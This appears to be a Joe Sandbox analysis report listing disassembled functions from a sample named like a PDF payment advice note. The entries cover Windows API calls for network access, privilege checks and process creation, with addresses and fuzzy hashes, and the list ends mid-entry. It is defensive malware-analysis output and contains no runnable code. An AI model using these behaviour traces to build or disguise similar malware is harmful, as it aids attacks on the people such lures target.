                                                              • GetCursorPos.USER32(?), ref: 008CC4D2
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0087B9AB,?,?,?,?,?), ref: 008CC4E7
                                                              • GetCursorPos.USER32(?), ref: 008CC534
                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0087B9AB,?,?,?), ref: 008CC56E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                              • String ID:
                                                              • API String ID: 2864067406-0
                                                              • Opcode ID: 288b71c9f1062d8cb3314ea5f04135af0d902259400b974264b5b1a6aed1c70f
                                                              • Instruction ID: b80a8a9d31446f0ce34bb402fee5d8eec12d544a28aff19527520e8a162f6d82
                                                              • Opcode Fuzzy Hash: 288b71c9f1062d8cb3314ea5f04135af0d902259400b974264b5b1a6aed1c70f
                                                              • Instruction Fuzzy Hash: D4315E35600458AFDB25CF58C858EAA7BBAFB49310F444169FA09CB2A1C731ED51DFA4
                                                              Function 00898656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0089810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00898121
                                                                • Part of subcall function 0089810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0089812B
                                                                • Part of subcall function 0089810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0089813A
                                                                • Part of subcall function 0089810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00898141
                                                                • Part of subcall function 0089810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00898157
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008986A3
                                                              • _memcmp.LIBCMT ref: 008986C6
                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008986FC
                                                              • HeapFree.KERNEL32(00000000), ref: 00898703
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                              • String ID:
                                                              • API String ID: 1592001646-0
                                                              • Opcode ID: b749b76ff1e6f195331665738ec159a50aabbb6a2a576f1921148dd1bfead475
                                                              • Instruction ID: e73af90424cee73102b0f7af4d644ef200be0d42b857c1a8edc449eced58ffba
                                                              • Opcode Fuzzy Hash: b749b76ff1e6f195331665738ec159a50aabbb6a2a576f1921148dd1bfead475
                                                              • Instruction Fuzzy Hash: 64215772E4010AEBDF11EFA8C949BAEB7B9FF56304F194059E444AB241DB31AE05CB90
                                                              Function 0086098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __setmode.LIBCMT ref: 008609AE
                                                                • Part of subcall function 00845A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008A7896,?,?,00000000), ref: 00845A2C
                                                                • Part of subcall function 00845A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008A7896,?,?,00000000,?,?), ref: 00845A50
                                                              • _fprintf.LIBCMT ref: 008609E5
                                                              • OutputDebugStringW.KERNEL32(?), ref: 00895DBB
                                                                • Part of subcall function 00864AAA: _flsall.LIBCMT ref: 00864AC3
                                                              • __setmode.LIBCMT ref: 00860A1A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                              • String ID:
                                                              • API String ID: 521402451-0
                                                              • Opcode ID: d39b011a70273db423ae26074556270b8990b9e5c63bcfe27faeed20fc4513ce
                                                              • Instruction ID: 04210c27a16eeba7c22a41c900543c75337851aa99e5671e40f82548476693a1
                                                              • Opcode Fuzzy Hash: d39b011a70273db423ae26074556270b8990b9e5c63bcfe27faeed20fc4513ce
                                                              • Instruction Fuzzy Hash: 3D1127315042087FDB04B6BCAC469BE7B69FF46320F250166F205D7183EE20484257A6
                                                              Function 008B1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008B17A3
                                                                • Part of subcall function 008B182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008B184C
                                                                • Part of subcall function 008B182D: InternetCloseHandle.WININET(00000000), ref: 008B18E9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Internet$CloseConnectHandleOpen
                                                              • String ID:
                                                              • API String ID: 1463438336-0
                                                              • Opcode ID: 19d83082a4f4b889d2e110986477c1d95c4c3cc6fb30b3f1976b26a3183ba8f6
                                                              • Instruction ID: 89129afc6d310b228dd9086291e38628076858b50b9235b97c1737ddeb90f940
                                                              • Opcode Fuzzy Hash: 19d83082a4f4b889d2e110986477c1d95c4c3cc6fb30b3f1976b26a3183ba8f6
                                                              • Instruction Fuzzy Hash: 5121FF32200605BFEF129F608C18FFABBAAFF48701F10402AFA11DA751DB31982097A5
                                                              Function 008A3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNEL32(?,008CFAC0), ref: 008A3A64
                                                              • GetLastError.KERNEL32 ref: 008A3A73
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 008A3A82
                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,008CFAC0), ref: 008A3ADF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                              • String ID:
                                                              • API String ID: 2267087916-0
                                                              • Opcode ID: 31c3adc27ec3b9029f8659a9dd96ea3113e05c121788398cc697d97bc7773fcf
                                                              • Instruction ID: 3fa49b173df937eb6503b9836d025b79f8c944b168ec9c7565280ce164e60c24
                                                              • Opcode Fuzzy Hash: 31c3adc27ec3b9029f8659a9dd96ea3113e05c121788398cc697d97bc7773fcf
                                                              • Instruction Fuzzy Hash: 0B2186745086259F9310DF28D88186ABBF4FF56368F104A1DF499C72A2D731EE46CB53
                                                              Function 0089DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0089F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0089DCD3,?,?,?,0089EAC6,00000000,000000EF,00000119,?,?), ref: 0089F0CB
                                                                • Part of subcall function 0089F0BC: lstrcpyW.KERNEL32(00000000,?,?,0089DCD3,?,?,?,0089EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0089F0F1
                                                                • Part of subcall function 0089F0BC: lstrcmpiW.KERNEL32(00000000,?,0089DCD3,?,?,?,0089EAC6,00000000,000000EF,00000119,?,?), ref: 0089F122
                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0089EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0089DCEC
                                                              • lstrcpyW.KERNEL32(00000000,?,?,0089EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0089DD12
                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,0089EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0089DD46
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: lstrcmpilstrcpylstrlen
                                                              • String ID: cdecl
                                                              • API String ID: 4031866154-3896280584
                                                              • Opcode ID: 7ffcfc68200cbb9754f2e52085464521a164dbc9e2a66a222981ad52c284e89c
                                                              • Instruction ID: 0c6a7201db024cac782f2d46261c85d0132da561102c6b6008094e168c8052fd
                                                              • Opcode Fuzzy Hash: 7ffcfc68200cbb9754f2e52085464521a164dbc9e2a66a222981ad52c284e89c
                                                              • Instruction Fuzzy Hash: 9E11BE7A200305EFDF25AF34C845D7A77A9FF45350B44812AF906CB2A1EB719841CBA9
                                                              Function 008750E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00875101
                                                                • Part of subcall function 0086571C: __FF_MSGBANNER.LIBCMT ref: 00865733
                                                                • Part of subcall function 0086571C: __NMSG_WRITE.LIBCMT ref: 0086573A
                                                                • Part of subcall function 0086571C: RtlAllocateHeap.NTDLL(01610000,00000000,00000001,00000000,?,?,?,00860DD3,?), ref: 0086575F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: 36c09889dab2faff92efee3a144467fe81dcd95fea9a577168967944ba0a6984
                                                              • Instruction ID: cfd2d5c3714177773d595495299dedafc54fd02c1a86af3afd3a89c8c4dfef49
                                                              • Opcode Fuzzy Hash: 36c09889dab2faff92efee3a144467fe81dcd95fea9a577168967944ba0a6984
                                                              • Instruction Fuzzy Hash: D9110672504A19AFDB316F78BC45B6D3B98FF00372F518629F90CD6255DEB0C94097A1
                                                              Function 008B6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00845A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008A7896,?,?,00000000), ref: 00845A2C
                                                                • Part of subcall function 00845A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008A7896,?,?,00000000,?,?), ref: 00845A50
                                                              • gethostbyname.WSOCK32(?,?,?), ref: 008B6399
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008B63A4
                                                              • _memmove.LIBCMT ref: 008B63D1
                                                              • inet_ntoa.WSOCK32(?), ref: 008B63DC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                              • String ID:
                                                              • API String ID: 1504782959-0
                                                              • Opcode ID: 4be58f71c06d7bcad9d6600541920147168554b4ec45f5c94ff84581f56110b2
                                                              • Instruction ID: 41a0481c164c863c19e2ab47069a5951fb15f0c2e8cd9795174ac2bcbad61468
                                                              • Opcode Fuzzy Hash: 4be58f71c06d7bcad9d6600541920147168554b4ec45f5c94ff84581f56110b2
                                                              • Instruction Fuzzy Hash: 66111C31500109AFCB04FBA8D946DEEBBB9FF58310B544065F506E7262EB31AE14DB62
                                                              Function 00898B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00898B61
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00898B73
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00898B89
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00898BA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 19b0b8511041b93d6bedfaf2445caf1859f6494bdde466c1fb02e8afd43575ff
                                                              • Instruction ID: 7684cca2b821a642dc434ec850c0786d4f926e02f2683e7ab7047f534545b9da
                                                              • Opcode Fuzzy Hash: 19b0b8511041b93d6bedfaf2445caf1859f6494bdde466c1fb02e8afd43575ff
                                                              • Instruction Fuzzy Hash: F1113A79900219FFEF10DB95CC84E9DBBB4FB48310F244095EA00B7250DA716E10DB94
                                                              Function 00841290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
                                                              • DefDlgProcW.USER32(?,00000020,?), ref: 008412D8
                                                              • GetClientRect.USER32(?,?), ref: 0087B5FB
                                                              • GetCursorPos.USER32(?), ref: 0087B605
                                                              • ScreenToClient.USER32(?,?), ref: 0087B610
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                              • String ID:
                                                              • API String ID: 4127811313-0
                                                              • Opcode ID: 8106866697d7e0b5b90a68ac06bde535c636fb922b7e006b265f045dfd880e77
                                                              • Instruction ID: 1455eee153a95c400dc41e7517f3b4dcece514dc1b4b94d981d18ccfd8944767
                                                              • Opcode Fuzzy Hash: 8106866697d7e0b5b90a68ac06bde535c636fb922b7e006b265f045dfd880e77
                                                              • Instruction Fuzzy Hash: 10112235A0012DEFDF10EFA8D889DEE77B9FB05300F404466FA01E7241D770AA919BA6
                                                              Function 008A1142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0089FCED,?,008A0D40,?,00008000), ref: 008A115F
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0089FCED,?,008A0D40,?,00008000), ref: 008A1184
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0089FCED,?,008A0D40,?,00008000), ref: 008A118E
                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,0089FCED,?,008A0D40,?,00008000), ref: 008A11C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CounterPerformanceQuerySleep
                                                              • String ID:
                                                              • API String ID: 2875609808-0
                                                              • Opcode ID: d8f622e89ef275b7b757074e70fb2e5c7c5b90406dc54e3a5a813c5ef49e5003
                                                              • Instruction ID: e7391c0a5797f6980944ca50ee9b1d001404e6911528778aeb1432368f2305a4
                                                              • Opcode Fuzzy Hash: d8f622e89ef275b7b757074e70fb2e5c7c5b90406dc54e3a5a813c5ef49e5003
                                                              • Instruction Fuzzy Hash: 37113C35D0051DDBEF009FA5D848AEEBBB9FF0A711F055056EB81F2241CB709560CB95
                                                              Function 0089D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0089D84D
                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0089D864
                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0089D879
                                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0089D897
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Type$Register$FileLoadModuleNameUser
                                                              • String ID:
                                                              • API String ID: 1352324309-0
                                                              • Opcode ID: 16b656f7833295f69b2241863046bd7699a42115365080639012ecacf8d2684b
                                                              • Instruction ID: 2f5d3acc668a47aa9831a77c0701049002ffbb748ccee3d58930736be65453c0
                                                              • Opcode Fuzzy Hash: 16b656f7833295f69b2241863046bd7699a42115365080639012ecacf8d2684b
                                                              • Instruction Fuzzy Hash: 4111A571601305DBF7209F90DC09F93BBBCFF00700F148979AA15E6042D7B0E5099BA5
                                                              Function 00876FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                              • String ID:
                                                              • API String ID: 3016257755-0
                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                              • Instruction ID: 3b4743aa0c2a11dfade16a0c34d67e1df784f4a9038f820bf15906229a074527
                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                              • Instruction Fuzzy Hash: 2A014E7244454EBBCF165F88CC41CED3F62FB18354B588415FA1C99035D236D9B1EB81
                                                              Function 008CB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 008CB2E4
                                                              • ScreenToClient.USER32(?,?), ref: 008CB2FC
                                                              • ScreenToClient.USER32(?,?), ref: 008CB320
                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 008CB33B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                              • String ID:
                                                              • API String ID: 357397906-0
                                                              • Opcode ID: 89342ac7f8a0dde8ff0d8a6ab1817bfe513c3c4db7990d3ced58d5a2ec3dc065
                                                              • Instruction ID: 14cb27b608869830d70f05c5686c29115f271a62ae8a22bf60343cf2c2f7cf03
                                                              • Opcode Fuzzy Hash: 89342ac7f8a0dde8ff0d8a6ab1817bfe513c3c4db7990d3ced58d5a2ec3dc065
                                                              • Instruction Fuzzy Hash: D31143B9D00649EFDB41CFA9C884EEEBBF9FB18310F108166E914E3220D735AA559F50
                                                              Function 008CB635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 008CB644
                                                              • _memset.LIBCMT ref: 008CB653
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00906F20,00906F64), ref: 008CB682
                                                              • CloseHandle.KERNEL32 ref: 008CB694
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseCreateHandleProcess
                                                              • String ID:
                                                              • API String ID: 3277943733-0
